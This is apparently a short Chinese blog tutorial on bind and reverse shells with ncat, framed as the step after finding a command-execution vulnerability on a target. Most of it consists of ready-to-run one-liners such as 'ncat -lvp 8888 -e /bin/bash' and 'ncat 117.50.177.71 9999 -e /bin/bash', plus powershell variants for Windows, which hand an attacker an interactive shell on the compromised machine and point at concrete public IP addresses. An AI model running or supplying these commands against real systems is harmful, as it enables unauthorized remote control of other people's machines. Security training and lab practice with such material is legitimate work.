正反向shell

正反向shell

在实际的应用场景中一般是先找到可以命令执行的漏洞,如果目标主机没有ncat我们要先执行下载ncat命令在被控的服务器上

正向shell

应用场景:在被控端的访问没有限制的时候,控制端向被控端发起了链接,控制端可以是公网ip也可以是内网ip

被控端为Linux:

shell 复制代码
被控端:ncat -lvp 8888 -e /bin/bash
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 /bin/bash

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

被控端为Windows

shell 复制代码
被控端:ncat -lvp 8888 -e powershell
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 powershell

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

在连接成功了之后(即在被控制端输入ncat 117.50.117.71 8888后)就可以输入指令查看被控端的各种信息

如图:

反向shell

应用场景:在被控端口发访问有限制,控制无法直接访问到被控端

由被控端向控制端发起连接,控制端要具备公网地址

被控端为Linux:

shell 复制代码
被控端:ncat 117.50.177.71 9999 -e /bin/bash
作用:使用ncat连接到指定的ip地址端口,在建立连接后执行bashshell
控制端:ncat -lvp 9999
作用:监听指定端口

被控端为Windows

shell 复制代码
被控端:ncat 117.50.117.71 8888 -e powershell
作用:使用ncat连接指定的地址端口,并在连接成功后执行 powershell

控制端:ncat -lvp 8888
作用:监听指定的端口

在控制端监听后即可对被控端控制

相关推荐
mooyuan天天5 小时前
AI辅助生成靶场源码指南:大模型自动化生成靶场skills技巧详解
web安全·渗透测试·靶场·ai安全
Micr0677 小时前
利用Werkzeug-Debug实现本地权限提升
python·web安全·网络安全
Chockmans8 小时前
春秋云境CVE-2021-34257
安全·web安全·网络安全·php·网络攻击模型·春秋云境·cve-2021-34257
李白你好9 小时前
一款面向网络安全攻防演练场景的自动化信息收集工具。
安全·web安全·自动化
calm1312 小时前
通信网络单元的划分和级别调整方法分享
网络·安全·web安全
oi..13 小时前
SRC 实战复盘:SSRF 漏洞挖掘、自动化检测及流量插件优化(含Burp suite 25.1.2文件)
笔记·web安全·网络安全·自动化·系统安全·安全架构
Andya_net14 小时前
网络安全 | NPing网络包生成工具详解
网络·安全·web安全
ll_af15 小时前
内网渗透完整链路:从外网打点到域控权限
网络·安全·web安全
星依网络16 小时前
文件上传漏洞绕过技巧 - 实战详解
web安全·网络安全
谪星·阿凯16 小时前
智榜样二阶段测试全解析博客
安全·web安全